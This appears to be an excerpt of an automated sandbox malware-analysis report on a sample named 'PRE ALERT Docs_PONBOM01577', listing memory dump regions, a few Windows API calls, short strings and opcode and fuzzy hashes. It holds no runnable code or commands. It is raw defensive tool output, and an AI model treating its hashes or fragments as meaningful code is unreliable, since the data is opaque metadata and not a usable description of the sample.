                        • API String ID: 2492992576-0
                        • Opcode ID: d789ebf768a9ca1f9d74c5db5c7aa14c6dadc238a94b9777078d8fbb6a25076f
                        • Instruction ID: 0698f65471fa363015fe0504ecdfd0435847546f892d820857737cd33db6d95f
                        • Opcode Fuzzy Hash: d789ebf768a9ca1f9d74c5db5c7aa14c6dadc238a94b9777078d8fbb6a25076f
                        • Instruction Fuzzy Hash: E01145B5800248DFCB10CF9AC844BDEFFF8EB48320F208459E419A7650C374A940CFA5
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 069C885D
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 25600d10af876207bef13aad3c9029224598950585b9bdb9465ab85f563bd8db
                        • Instruction ID: dea6702f9aba8afa49b95fd4e32ca0a5f6a4213a1d8902969208a5841326f9ef
                        • Opcode Fuzzy Hash: 25600d10af876207bef13aad3c9029224598950585b9bdb9465ab85f563bd8db
                        • Instruction Fuzzy Hash: 781103B19003488FDB20DF9AD544BDEFFF8EB48324F208459E519A7610C378A944CFA5
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,069C8315), ref: 069C839F
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: d6dd1093f220bb43443f43a5f3a759b169a6d64f8758f3806283eac250136204
                        • Instruction ID: 5ba7aa8794625cb5be5d2103fbc27f26a3febfa7ee9b84cefe57661b553d4539
                        • Opcode Fuzzy Hash: d6dd1093f220bb43443f43a5f3a759b169a6d64f8758f3806283eac250136204
                        • Instruction Fuzzy Hash: 8D11F2B1900248CFCB50DF9AC544BDEFFF8EB48324F208459E559A7650C375A944CFA5
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 069C885D
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 4a6660526f61aa4e2e9cc1110715e87ddb3ed38837efce56c04dc9d0e727ce31
                        • Instruction ID: c0063b2efb5b627246b0b8b74a86efa7471fd58f4589c770863158806fba795b
                        • Opcode Fuzzy Hash: 4a6660526f61aa4e2e9cc1110715e87ddb3ed38837efce56c04dc9d0e727ce31
                        • Instruction Fuzzy Hash: 2A1103B59003498FDB20DFAAD544BDEFFF8EB48320F248459E559A7610C374A584CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: b7249dd15b1de555958ab28e7b962b317696f1b4ae5c65e354b74b60f4c879ac
                        • Instruction ID: 9932544c0c2a84b8185a56f8f3e737766107b2908475f3eeaddb5e03def649c6
                        • Opcode Fuzzy Hash: b7249dd15b1de555958ab28e7b962b317696f1b4ae5c65e354b74b60f4c879ac
                        • Instruction Fuzzy Hash: D741CF71E0420A9FDB65FFA5C45069EBBB6BF85300F104929E406EF240DB70E946CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: XPcq
                        • API String ID: 0-714321711
                        • Opcode ID: d818e2de63bc52765a186bef620ed9b83a3b4373ee2b4d77b3c207f623f56a07
                        • Instruction ID: d1649a311aea1cc413e4977c6c568e3f8c8cd2ed8d3c69a388760533e93fed53
                        • Opcode Fuzzy Hash: d818e2de63bc52765a186bef620ed9b83a3b4373ee2b4d77b3c207f623f56a07
                        • Instruction Fuzzy Hash: 3F415F70F002199FDB559FA9C854BAEBBF7FF88700F208529E106AB395DA718C058B91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: 87de7bdf6be4128ed32b923a9f5dd4745ae60b28e4e9d345743efc38107f2c8a
                        • Instruction ID: 5ea31a14e345a1864e39d741191f2b263a213dfa465b9478174bbe5b889922bf
                        • Opcode Fuzzy Hash: 87de7bdf6be4128ed32b923a9f5dd4745ae60b28e4e9d345743efc38107f2c8a
                        • Instruction Fuzzy Hash: D131F030B102028FDB59AB74C56476EBBE2AF89204F1485B8D006DF385EE35CD86CBA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: e6f8099623af4134f61fab9b7576872c1e340e771382f4f99f01193fea945b88
                        • Instruction ID: 83585636dd9d317fac8ca71687c189fd548a3f79378a14db0580829f90dd884a
                        • Opcode Fuzzy Hash: e6f8099623af4134f61fab9b7576872c1e340e771382f4f99f01193fea945b88
                        • Instruction Fuzzy Hash: DE31E030B102018FDB59AB74D51476EBBE7AB89200F208578D406DF384EE75DD86CBA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: |
                        • API String ID: 0-2343686810
                        • Opcode ID: dc4807cd9a747b2c89a3abc69ee79c91e0c0eef517fd0457ba322862d5aaa01a
                        • Instruction ID: 3d035c4fe8b244403146194c125cdc138016cfd7aae3ab750d89fffbb52fabc8
                        • Opcode Fuzzy Hash: dc4807cd9a747b2c89a3abc69ee79c91e0c0eef517fd0457ba322862d5aaa01a
                        • Instruction Fuzzy Hash: 9C117F75B002149FDB44AB78C814BAE77F6AF4C710F148469E60AEB3A0DB359D018B94
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: |
                        • API String ID: 0-2343686810
                        • Opcode ID: 693bfef2981dbf03f0214b5bb787d97b31aab381e2d960578c71839c49f0125a
                        • Instruction ID: 7cb464b8992452331b3ee05893a4084b164dbfb92b25b0deadece96530295c6f
                        • Opcode Fuzzy Hash: 693bfef2981dbf03f0214b5bb787d97b31aab381e2d960578c71839c49f0125a
                        • Instruction Fuzzy Hash: 4D115B70B042249FDB44AF78C814B6E7BF2AF8C710F148469E60AEB3A5DB359901CB81
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdb6a06fb67d8c17950f3569c927e2128838193be295e83e3921a062303d0eb0
                        • Instruction ID: 3e93af74ae67bc6e48715d189473fc6d8ab7cbecd4f9dd7dcffbd1ae7fc8577f
                        • Opcode Fuzzy Hash: fdb6a06fb67d8c17950f3569c927e2128838193be295e83e3921a062303d0eb0
                        • Instruction Fuzzy Hash: 5861B1B1F000114FCB55AB7EC88866FAAD7AFC5614B15443AD80EDF364EE65DD0287D2
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3094ad7b6304685c40b5d7a0a62bd50f3df80625d9cdee2ab29bb6b1037c6acc
                        • Instruction ID: a954e1dfa1abf7a4abc648005140b1811c63df762ecc1f1bed7eca11bac57538
                        • Opcode Fuzzy Hash: 3094ad7b6304685c40b5d7a0a62bd50f3df80625d9cdee2ab29bb6b1037c6acc
                        • Instruction Fuzzy Hash: 8E814D30B002099FDF54EFA9D5546AEB7F2AF89304F148529D40AEF394EB74DC428B91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8357cf0883aa3258c12920011434e85833d70655adcb7c33129d7fc3408de81a
                        • Instruction ID: 8a0fb992866a6976325d0e55ea6d0f6d4e0df182caef5eb98a7219392477fd4c
                        • Opcode Fuzzy Hash: 8357cf0883aa3258c12920011434e85833d70655adcb7c33129d7fc3408de81a
                        • Instruction Fuzzy Hash: 2E913E34E102198FDF60DF68C890B9DB7B1FF89304F208695D549AB295DB70AA86CF51
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c590f1675489e6278e5e6a93d8fda47c9c454a2b6d302169ed6062cab12f787
                        • Instruction ID: f9406047603e887c425e0f4432dd962bc31ddd461b0f114127e157b66ba75c57
                        • Opcode Fuzzy Hash: 1c590f1675489e6278e5e6a93d8fda47c9c454a2b6d302169ed6062cab12f787
                        • Instruction Fuzzy Hash: 89914E34E102198BDF60DF68C890B9DB7B1FF89304F208695D549BB295DB70AA86CF51
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a3d371d6984cbcea363a4aa0f11cfcd6a2f8c7bbf704c61aeeb48d99adaaa4f
                        • Instruction ID: 1c5362e4a3a5d5c4829877bc82d55f85e3a9ca5c0927b7021f9057fd70697bf6
                        • Opcode Fuzzy Hash: 2a3d371d6984cbcea363a4aa0f11cfcd6a2f8c7bbf704c61aeeb48d99adaaa4f
                        • Instruction Fuzzy Hash: 23713A71A012099FDB54EFA8D990A9EBBF6FF88300F248429E405EB355DB30E846CB50
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eeeffed15d341c2ba77e5c7fc32562189f09a6a15cd4a5cfe551c30d784d31e1
                        • Instruction ID: 69609090d223df623801b51bc8d16fb1a7f22ab33d579253fb209e97ba87782d
                        • Opcode Fuzzy Hash: eeeffed15d341c2ba77e5c7fc32562189f09a6a15cd4a5cfe551c30d784d31e1
                        • Instruction Fuzzy Hash: CD711931A002099FDB55EFA9D990A9EBBF6FF88304F248429D415EB355DB30ED46CB50
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f007c39a8ba725de06e816b347fd7bda27df5e48974683f609e7f187667f8ef
                        • Instruction ID: e8546a866606b2c081bb015762d62f48a9b8168568b6182421f3d96b53e05d59
                        • Opcode Fuzzy Hash: 5f007c39a8ba725de06e816b347fd7bda27df5e48974683f609e7f187667f8ef
                        • Instruction Fuzzy Hash: FE51C031E01145EFDB54BF78E8546ADBBF2EB84315F10886AE10ADF250DB319946CB91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 931c1d673b5f72d8c66cb92f737f9c6ed49c772ec1c0b592a030d248f2fb074c
                        • Instruction ID: 2cea22968377f5c9ea580d8b267be2300960809c67c33ba13807ab50bd13842f
                        • Opcode Fuzzy Hash: 931c1d673b5f72d8c66cb92f737f9c6ed49c772ec1c0b592a030d248f2fb074c
                        • Instruction Fuzzy Hash: 6751B331B10294DFEF646B6CD99476F269ED789310F20482AE50ADF3A4DA39CC468792
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f18505b4a165232dfe7e3fa09dd3ef4c4e6b12e544990462ff8b9d57eda486a
                        • Instruction ID: 89b4d4f0f7d1d4a01faaf14e55ea1f976e4a03662144451221cd9474a1d5ea36
                        • Opcode Fuzzy Hash: 5f18505b4a165232dfe7e3fa09dd3ef4c4e6b12e544990462ff8b9d57eda486a
                        • Instruction Fuzzy Hash: 2851A531B10294DFEF647B6CD99472F269ED789350F20482AE10ADF3A4DA79CC458792
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cd67da28b259b05a5fe0e648c06e53d6f3240930141458d3067fcf0682d7cc7
                        • Instruction ID: 27bfb4494313c801c80c1b2c1e8663fbe7a647a0fcd9fbbc9ed61cca976afd10
                        • Opcode Fuzzy Hash: 0cd67da28b259b05a5fe0e648c06e53d6f3240930141458d3067fcf0682d7cc7
                        • Instruction Fuzzy Hash: 2C414BB2E006099FDF70DFA9D8C0AAFFBF6EB84314F10492AD156DB640D731A9458B91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e24c54a1ac940e0e24066613f14ec61e7b4017a470e050c4620f997ea9f1d75a
                        • Instruction ID: db2ea51f37faf1bb1062e9ee1bc4b212d5db2657c6fd548c262835090c6b1993
                        • Opcode Fuzzy Hash: e24c54a1ac940e0e24066613f14ec61e7b4017a470e050c4620f997ea9f1d75a
                        • Instruction Fuzzy Hash: F2317C31E002059FCB45DFA4D85469EBBF2FF89300F148929E916EB750DB31E982CB50
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b11fa36163a11619feefc48d1cc6601e8ecefa9a72bd5bc3aaf0b9b124af131e
                        • Instruction ID: 9b2ed1d4c80882b3062d4f689176e777eb7eafddae71d1168aac8fab5ef1d7da
                        • Opcode Fuzzy Hash: b11fa36163a11619feefc48d1cc6601e8ecefa9a72bd5bc3aaf0b9b124af131e
                        • Instruction Fuzzy Hash: 18315A31E002099FCB49DFA4D85469EB7F2FF89300F148929E906EB740DB71E982CB90
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4aa02c4812f7a598df3ea49037a01ecc45dec0e73e833c8eacea905ae15fd79a
                        • Instruction ID: 81d1b6a0fbbe1cee56695df3ff7dbdac722ad8b15738ed2adc530c0838593aeb
                        • Opcode Fuzzy Hash: 4aa02c4812f7a598df3ea49037a01ecc45dec0e73e833c8eacea905ae15fd79a
                        • Instruction Fuzzy Hash: 38219171F012159FDF50EF69E880AEEB7F5AB48710F108129E509EB351E735D9018B91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7313b70ede390a4157e0c9bdc74eeac09a357f31c4b871abdb9a522a2c236e67
                        • Instruction ID: 27d4d40a3131b0bc923bf8f0c9ba93d932f725772086973c6e266b1d17714048
                        • Opcode Fuzzy Hash: 7313b70ede390a4157e0c9bdc74eeac09a357f31c4b871abdb9a522a2c236e67
                        • Instruction Fuzzy Hash: 95218CB5F012199FDF40EF69D880AAEBBF5FB48710F108129E919EB384E731D9018B91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 617763926e90555c4ac362066c02dc6f733bcb724dbc4478f1bf75049a4ccc51
                        • Instruction ID: c3ca4e7d1e0ef9257d75e61328f01ca75661897bbdddd48a67ac13df9086799a
                        • Opcode Fuzzy Hash: 617763926e90555c4ac362066c02dc6f733bcb724dbc4478f1bf75049a4ccc51
                        • Instruction Fuzzy Hash: 9321A535B052159FDB51EB78D4606AFB7F6FB4A214F108469E40ADF380DA31DE42C791
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098281631.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_132d000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d53c82dbf1b559d5f0160f4d5b059043f218e1dd47eeb48aa32014e6f520e7c
                        • Instruction ID: 7fd122cd1f8f4ed91fb526aba2a4107ddd4afeca66ae68bb70402aa6e1fc8108
                        • Opcode Fuzzy Hash: 7d53c82dbf1b559d5f0160f4d5b059043f218e1dd47eeb48aa32014e6f520e7c
                        • Instruction Fuzzy Hash: 18212671504204DFDB15EF58D9C0B26BFA5FB84318F24C66DD9494B366C33AD847CA62
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098281631.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_132d000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1fcb2f17789ab71a82329aff9ab6a42eba8aebba582f89aa7f919a66b082da2e
                        • Instruction ID: 36501864b5b696a2a070487d5ad8af7ec47c70992b3ebfcc99b8b457193b8b0b
                        • Opcode Fuzzy Hash: 1fcb2f17789ab71a82329aff9ab6a42eba8aebba582f89aa7f919a66b082da2e
                        • Instruction Fuzzy Hash: 7E210471604244DFDB45EF58C9C0B26BFA5FB84318F30C56DD80A4BB96C336E846C661
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6cc7c188857350ac78723b9830c4d4ee7c0a21058eaedc720da69358db31b35a
                        • Instruction ID: 510669dba516fbe17bf779b91bf8513af39077c334093301795a11f23b19e92f
                        • Opcode Fuzzy Hash: 6cc7c188857350ac78723b9830c4d4ee7c0a21058eaedc720da69358db31b35a
                        • Instruction Fuzzy Hash: E4219031B101199FDF44EB69E86069EB7B6EB84314F248429E409EF345DB30ED418B84
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 093c8e19b025cb7666faf09bb1b3c5fb0f43812e18a6dc226439f8d00c5a1af4
                        • Instruction ID: d112fc03fc8f5ad9bd0b05534ca308e2872c19d7e10202f0bc354fd2dde86301
                        • Opcode Fuzzy Hash: 093c8e19b025cb7666faf09bb1b3c5fb0f43812e18a6dc226439f8d00c5a1af4
                        • Instruction Fuzzy Hash: AB116135B141295FDF54AA79D814AAE73ABEFC8310F00853AD50AEB344EE25EC068B91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: afc77385cfa04351fe4d671446ad1ad79697fd7f7248bddadc98e4dbadc686ff
                        • Instruction ID: 1a2f36faef2a211564dcf3e9b5a75cf9ed3e6764a2a54dace319322776030493
                        • Opcode Fuzzy Hash: afc77385cfa04351fe4d671446ad1ad79697fd7f7248bddadc98e4dbadc686ff
                        • Instruction Fuzzy Hash: 4E01F232B005115FCB65AB7CA850B6F77EBEBCA714F14883AE50ACF341EA25DC424395
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ceb4ac9006c06f22f4b710b515bb6c7700198c0632f9065135b12473c1e6cbaf
                        • Instruction ID: c623205dfa340f4e3f10c7ac34d3d094f836bfb1204615e2982c7c710bf69fd0
                        • Opcode Fuzzy Hash: ceb4ac9006c06f22f4b710b515bb6c7700198c0632f9065135b12473c1e6cbaf
                        • Instruction Fuzzy Hash: 4601F131B001411FCF61AA3EA41075BB7DACBCA610F14883EE50ECF780EA22DD024395
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a84b59e0cacaab0818dc2bdcfcb082311c21cfc6f50e091f289d97058e2f30c2
                        • Instruction ID: 3b5134b1672e1ae920e5bbff2c575caf334889b2cf181f3d5662f17e6bdfbe4d
                        • Opcode Fuzzy Hash: a84b59e0cacaab0818dc2bdcfcb082311c21cfc6f50e091f289d97058e2f30c2
                        • Instruction Fuzzy Hash: 0D01D435B140286BDF54AA6A9C14BEF73AF9BC8210F00403AD40AEB344EE649C0387E2
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67fc61be649ca9c5d3627ad204021ea49120bb0b42ba638915e2527ba6350920
                        • Instruction ID: e46cdd42af0bdaf22ab467b28651d99a49456974962e66b75edce5a0769dc5ba
                        • Opcode Fuzzy Hash: 67fc61be649ca9c5d3627ad204021ea49120bb0b42ba638915e2527ba6350920
                        • Instruction Fuzzy Hash: D521C0B5D01219EFCB00DF9AD884ACEFBB8FB48320F10812AE518A7240C374A954CFA5
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098281631.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_132d000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction ID: ecf783b7cbcdd6d3e3c200f316909148b26adaabfa4edd85ea3916c23f32ae59
                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction Fuzzy Hash: D311BB75504280CFDB12DF58D9C4B15BFA1FB84318F28C6AAD8494B666C33AD44ACB62
                        Memory Dump Source
                        • Source File: 00000002.00000002.4098281631.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_132d000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                        • Instruction ID: d8302f4fbdaddf9ab8a5bf47aab0cfb228a906313ec1df92b10266ebbb49a52f
                        • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                        • Instruction Fuzzy Hash: AC118B75504284CFDB06DF54D9C4B15BFA2FB84218F24C6A9D8494BA96C33AE44ACB92
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49020b394e404ce671d1b4ec082fcb499a0761ad5c37d3dd2ce3996dc66a7964
                        • Instruction ID: 08f3267fa57b881539147aa49eccb230148c415be55c201360c798f04789f3f6
                        • Opcode Fuzzy Hash: 49020b394e404ce671d1b4ec082fcb499a0761ad5c37d3dd2ce3996dc66a7964
                        • Instruction Fuzzy Hash: B511D3B1D01219EFCB00DF9AD884ACEFBB4FB48320F10812AE518B7240C374A954CFA5
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
